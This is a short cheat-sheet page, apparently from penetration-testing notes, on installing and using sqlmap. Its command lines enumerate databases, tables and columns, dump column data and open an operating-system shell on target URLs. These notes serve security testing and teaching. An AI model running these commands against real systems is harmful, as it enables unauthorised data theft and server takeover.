SQLmap

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Install

 sudo apt-get install sqlmap

Run

sqlmap -h

Basic usage

//List information about Tables present in a particular Database
sqlmap -u http://example.com/example.php?cat=1 --dbs 

//List information about Tables present in a particular Database 
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 
-D acuart --tables 

//List information about the columns of a particular table
sqlmap -u http://example.com/example.php?cat=1 -D acuart -T (table) --columns

//Dump the data from the columns
sqlmap -u http://example.com/example.php?cat=1 -D acuart -T (table) -C (column) --dump

//Shell 
sqlmap -u "http://10.10.16.131:88/sql-php/sql_normal.php?id=1" --os-shell

Resources:

https://www.geeksforgeeks.org/use-sqlmap-test-website-sql-injection-vulnerability/

PreviousRoutersploit NextWPscan

Last updated 4 years ago

Was this helpful?